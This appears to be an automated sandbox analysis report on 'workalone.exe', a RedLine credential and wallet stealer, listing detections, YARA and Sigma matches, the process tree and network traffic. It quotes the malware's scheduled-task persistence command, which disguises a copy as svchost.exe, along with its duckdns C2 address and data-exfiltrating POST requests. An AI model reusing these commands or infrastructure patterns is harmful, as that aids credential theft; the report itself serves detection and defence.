Edit tour

Windows Analysis Report
workalone.exe

Overview

General Information

Sample Name:	workalone.exe
Analysis ID:	756291
MD5:	68f42f485ece93306bef1e4084d3052e
SHA1:	c63f1a56d12a0acbf5e9a354d8a66c6e17af2309
SHA256:	5d526be000146cf9cf94f7ef6f4e86929d508e17ca483b03d4ecbd2d52e071c9
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Malicious sample detected (through community Yara rule)

Sigma detected: Schedule system process

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Tries to steal Crypto Currency Wallets

Connects to many ports of the same IP (likely port scanning)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Drops PE files with benign system names

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Enables debug privileges

Is looking for software installed on the system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Drops PE files

Detected TCP or UDP traffic on non-standard ports

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

workalone.exe (PID: 5836 cmdline: C:\Users\user\Desktop\workalone.exe MD5: 68F42F485ECE93306BEF1E4084D3052E)

workalone.exe (PID: 5956 cmdline: C:\Users\user\Desktop\workalone.exe MD5: 68F42F485ECE93306BEF1E4084D3052E)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5972 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6040 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6108 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 6080 cmdline: cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["saleshor12.duckdns.org:46539"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x2b90a:$a4: get_ScannedWallets 0x4373a:$a4: get_ScannedWallets 0x5b35a:$a4: get_ScannedWallets 0x2a768:$a5: get_ScanTelegram 0x42598:$a5: get_ScanTelegram 0x5a1b8:$a5: get_ScanTelegram 0x2b58e:$a6: get_ScanGeckoBrowsersPaths 0x433be:$a6: get_ScanGeckoBrowsersPaths 0x5afde:$a6: get_ScanGeckoBrowsersPaths 0x293aa:$a7: <Processes>k__BackingField 0x411da:$a7: <Processes>k__BackingField 0x58dfa:$a7: <Processes>k__BackingField 0x272bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3f0ec:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x56d0c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x28cde:$a9: <ScanFTP>k__BackingField 0x40b0e:$a9: <ScanFTP>k__BackingField 0x5872e:$a9: <ScanFTP>k__BackingField
Process Memory Space: workalone.exe PID: 5836	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: workalone.exe PID: 5836	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: workalone.exe PID: 5836	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x15cde:$a4: get_ScannedWallets 0x14b85:$a5: get_ScanTelegram 0x15967:$a6: get_ScanGeckoBrowsersPaths 0x13818:$a7: <Processes>k__BackingField 0x10d4b:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1314c:$a9: <ScanFTP>k__BackingField
Process Memory Space: workalone.exe PID: 5956	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: workalone.exe PID: 5956	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: workalone.exe PID: 5956	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x5ffab5:$a4: get_ScannedWallets 0x5fe95c:$a5: get_ScanTelegram 0x5ff73e:$a6: get_ScanGeckoBrowsersPaths 0x5fd5ef:$a7: <Processes>k__BackingField 0x5fab22:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x5fcf23:$a9: <ScanFTP>k__BackingField
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.workalone.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.0.workalone.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.workalone.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165fe:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165df:$v2_6: GetUpdates
1.0.workalone.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.workalone.exe.3a29170.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.workalone.exe.3a29170.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.workalone.exe.3a29170.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147fe:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147df:$v2_6: GetUpdates
0.2.workalone.exe.3a29170.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.workalone.exe.3a11340.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.workalone.exe.3a11340.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.workalone.exe.3a11340.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147fe:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147df:$v2_6: GetUpdates
0.2.workalone.exe.3a11340.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.workalone.exe.3a29170.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.workalone.exe.3a29170.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.workalone.exe.3a29170.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
0.2.workalone.exe.3a29170.0.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
0.2.workalone.exe.3a11340.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.workalone.exe.3a11340.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.workalone.exe.3a11340.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282ba:$u7: RunPE 0x3feda:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b971:$u8: DownloadAndEx 0x43591:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f60:$pat14: , CommandLine: 0x38b80:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2aea9:$v2_1: ListOfProcesses 0x42ac9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
0.2.workalone.exe.3a11340.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3fa:$a4: get_ScannedWallets 0x4301a:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a258:$a5: get_ScanTelegram 0x41e78:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b07e:$a6: get_ScanGeckoBrowsersPaths 0x42c9e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e9a:$a7: <Processes>k__BackingField 0x40aba:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26dac:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3e9cc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287ce:$a9: <ScanFTP>k__BackingField 0x403ee:$a9: <ScanFTP>k__BackingField
Click to see the 15 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\workalone.exe, ParentImage: C:\Users\user\Desktop\workalone.exe, ParentProcessId: 5836, ParentProcessName: workalone.exe, ProcessCommandLine: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f, ProcessId: 6040, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: workalone.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe

Avira: detection malicious, Label: HEUR/AGEN.1235903

Machine Learning detection for sample

Source: workalone.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe

Joe Sandbox ML: detected

Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: RedLine {"C2 url": ["saleshor12.duckdns.org:46539"], "Bot Id": "cheat"}

Source: workalone.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: workalone.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 85.208.136.178 ports 46539,3,4,5,6,9

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 46539
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 46539
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 46539
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 46539
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 46539 -> 49688

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: saleshor12.duckdns.org:46539

Uses dynamic DNS services

Source: unknown

DNS query: name: saleshor12.duckdns.org

Source: Joe Sandbox View

ASN Name: CMCSUS CMCSUS

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: saleshor12.duckdns.org:46539Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: saleshor12.duckdns.org:46539Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: saleshor12.duckdns.org:46539Content-Length: 1144458Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: saleshor12.duckdns.org:46539Content-Length: 1144450Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.3:49685 -> 85.208.136.178:46539

Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.ado/1
Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://saleshor12.duckdns.org
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://saleshor12.duckdns.org:
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://saleshor12.duckdns.org:46539
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://saleshor12.duckdns.org:46539/
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/t_
Source: tmp1B56.tmp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp1B56.tmp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp1B56.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp1B56.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
